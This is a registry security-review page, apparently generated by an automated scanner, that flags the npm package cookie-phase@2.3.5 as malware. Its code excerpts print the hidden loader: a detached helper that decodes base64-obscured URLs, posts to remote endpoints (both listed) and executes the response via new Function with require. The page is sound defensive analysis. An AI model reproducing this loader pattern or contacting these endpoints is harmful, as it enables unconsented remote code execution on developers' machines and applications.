registry  /  cookie-phase  /  2.3.5

cookie-phase@2.3.5

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Runtime use of the exported middleware launches a detached helper that fetches code from a remote endpoint and executes it. This is unconsented remote code execution in the consuming application's context.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Calling the exported function from index.js, as shown by normal package usage.
Impact
Remote server can run arbitrary Node.js code with access to require and the consumer app's privileges.
Mechanism
detached child process plus remote JavaScript execution
Attack narrative
A consumer imports cookie-phase and calls the exported middleware/plugin. index.js starts a detached node process running lib/initializeCaller.js. That helper decodes a hidden URL, posts to it with axios, then treats the server response as JavaScript and runs it through new Function with require available, allowing arbitrary remote payload execution.
Rationale
The source confirms a runtime path from normal package use to a detached helper that fetches and executes remote code; this is concrete malicious behavior even without install hooks. Scanner labels are corroborated by direct inspection of index.js and lib/initializeCaller.js.
Evidence
package.jsonindex.jslib/initializeCaller.jslib/const.jsREADME.md
Network endpoints2
ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05dfpurple-kelila-79.tiiny.site/data.json

Decision evidence

public snapshot
AI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js exports middleware that spawns detached node child process for lib/initializeCaller.js when called.
  • lib/initializeCaller.js decodes an obscured HTTPS endpoint and POSTs to it with axios.
  • lib/initializeCaller.js executes response.data via new Function("require", response.data).
  • README presents normal chai plugin usage that calls cookiePhase, activating the background task.
  • lib/const.js contains another base64-obscured URL, though it is not imported by the observed entrypoint.
Evidence against
  • package.json has no install/preinstall/postinstall lifecycle scripts.
  • The helper shadows process.env with hardcoded values rather than directly harvesting the real host environment.
  • No filesystem writes, persistence, destructive code, or AI-agent control-surface mutation found in inspected source.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 17 file(s), 53.3 KB of source, external domains: github.com

Source & flagged code

7 flagged · loading source
index.jsView file
3const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
3Cross-file remote execution chain: index.js spawns lib/initializeCaller.js; helper contains network access plus dynamic code execution. L3: const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants'); ... L37: function runBackgroundTask(args) { L38: const scriptPath = path.resolve(__dirname, './lib/initializeCaller.js'); L39:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

index.jsView on unpkg · L3
matchType = malicious_source_fingerprint_signature signature = 3522c2fe164c56ca signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = chai-as-smart@2.3.5 matchedPath = index.js matchedIdentity = npm:Y2hhaS1hcy1zbWFydA:2.3.5 similarity = 1.000 shingleOverlap = 12 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
lib/initializeCaller.jsView file
28.then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Eval

Package source references dynamic code evaluation.

lib/initializeCaller.jsView on unpkg · L28
13const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); L15: const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializeCaller.jsView on unpkg · L13
2L3: const axios = require("axios"); L4: const process = { ... L12: (async function initializeCaller(..._args) { L13: const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L2
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

6 High3 Medium3 Low
HighChild Processindex.js
HighEvallib/initializeCaller.js
HighSame File Env Network Executionlib/initializeCaller.js
HighCross File Remote Execution Contextindex.js
HighBase64 Obscured Urllib/initializeCaller.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings